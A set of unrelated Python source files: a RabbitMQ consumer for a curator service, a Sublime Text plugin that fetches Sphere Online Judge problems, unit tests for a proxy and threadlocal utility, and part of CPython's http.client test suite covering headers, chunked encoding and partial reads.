distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
import logging
import traceback
from threading import Thread
import pika
from pika.exceptions import ConnectionClosed
from sdh.curator.actions import execute
from sdh.curator.server import app
__author__ = 'Fernando Serena'
log = logging.getLogger('sdh.curator.messaging')
RABBIT_CONFIG = app.config['RABBIT']
def callback(ch, method, properties, body):
action_args = method.routing_key.split('.')[2:]
log.info('--> Incoming {} request!'.format(action_args[0]))
try:
execute(*action_args, data=body)
except (EnvironmentError, AttributeError, ValueError) as e:
# traceback.print_exc()
log.error(e.message)
ch.basic_reject(delivery_tag=method.delivery_tag, requeue=False)
log.debug('Sent REJECT')
else:
ch.basic_ack(delivery_tag=method.delivery_tag)
log.debug('Sent ACK')
def __setup_queues():
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(
host=RABBIT_CONFIG['host']))
except ConnectionClosed:
log.error('AMQP broker is not available')
else:
channel = connection.channel()
log.info('Connected to the AMQP broker: {}'.format(RABBIT_CONFIG))
channel.exchange_declare(exchange='sdh',
type='topic', durable=True)
# Create the requests queue and binding
queue_name = 'curator_requests'
channel.queue_declare(queue_name, durable=True)
channel.queue_bind(exchange='sdh', queue=queue_name, routing_key='curator.request.*.#')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback, queue=queue_name)
log.info('Ready to accept requests')
channel.start_consuming()
th = Thread(target=__setup_queues)
th.daemon = True
th.start()
|
plugin.py
|
import sublime, sublime_plugin, json, threading
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
try:
from utils import cache
except:
from .utils import cache
@cache
def get_text(id):
try:
return (urlopen("http://sphereonlinejudge.herokuapp.com/problem/%s" % id.upper()).read().decode("utf-8").replace("\r", ""))
except:
return None
class SphereOnlineCommand(sublime_plugin.TextCommand):
def fetch_text(self):
region = sublime.Region(0,self.view.size())
content = self.view.substr(region)
return content
def check_for_doc(self):
array = self.fetch_text().split("\n")[:5:]
for i, e in enumerate(array):
if "@problem:" in e:
return e.split("@problem:")[-1].strip()
return None
def run(self, edit, types=None):
self.holder = None
self.window = sublime.active_window()
id = self.check_for_doc()
if id and types=="read":
self.display(id)
else:
if not self.holder:
self.window.show_input_panel(
"Sphere Online Judge Problem ID:", '', lambda s: self.display(s), None, None)
else:
self.window.show_input_panel(
"Sphere Online Judge Problem ID:", HOLDER, lambda s: self.display(s), None, None)
def display(self, id):
sublime.status_message("Fetching problem content..")
self.holder = id
self.id = id
thread = threading.Thread(target=self.display_content)
thread.start()
def display_content(self):
string = get_text(self.id)
if string is None:
sublime.status_message("Invalid Code")
sublime.error_message("Invalid Problem Code")
else:
self.show_text(string)
sublime.status_message("")
def show_text(self,msg):
self.output_view = self.window.get_output_panel("textarea")
self.window.run_command("show_panel", {"panel": "output.textarea"})
s = self.output_view.settings()
s.set("word_wrap", True)
self.output_view.set_read_only(False)
self.output_view.run_command("append", {"characters": msg})
self.output_view.set_read_only(True)
|
test_proxy.py
|
# -*- coding: utf8 -*-
# Copyright (c) 2019 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import threading
from collections import abc
from nr.util.proxy import *
def test_proxy():
p = proxy(lambda: None)
assert p == None
# An unfortunate side-effect of implementing __iter__().
assert isinstance(p, abc.Iterable)
# TODO (NiklasRosenstein): Why does it not behave like abc.Iterable?
assert not isinstance(p, abc.Mapping)
def test_proxy_auto_increment():
count = [0]
def auto_increment_():
count[0] += 1
return count[0]
auto_increment = proxy(auto_increment_)
assert auto_increment == 1
assert auto_increment == 2
assert auto_increment + 10 == 13
assert count[0] == 3
def test_proxy_lazy_not_auto_increment():
count = [0]
def auto_increment_():
count[0] += 1
return count[0]
auto_increment = proxy(auto_increment_, lazy=True)
assert auto_increment == 1
assert auto_increment == 1
assert auto_increment == 1
assert count[0] == 1
def test_threadlocal():
l: int = threadlocal()
sink = set()
lock = threading.Lock()
def _run(value: int):
for i in range(1000):
assert empty(l)
push(l, value)
assert not empty(l)
assert get(l) == value
assert pop(l) == value
assert empty(l)
with lock:
sink.add(value)
threads = [
threading.Thread(target=lambda: _run(99)),
threading.Thread(target=lambda: _run(10)),
threading.Thread(target=lambda: _run(321)),
]
[t.start() for t in threads] # type: ignore
_run(42)
[t.join() for t in threads] # type: ignore
assert sink == set([99, 10, 321, 42])
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import socket
import threading
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
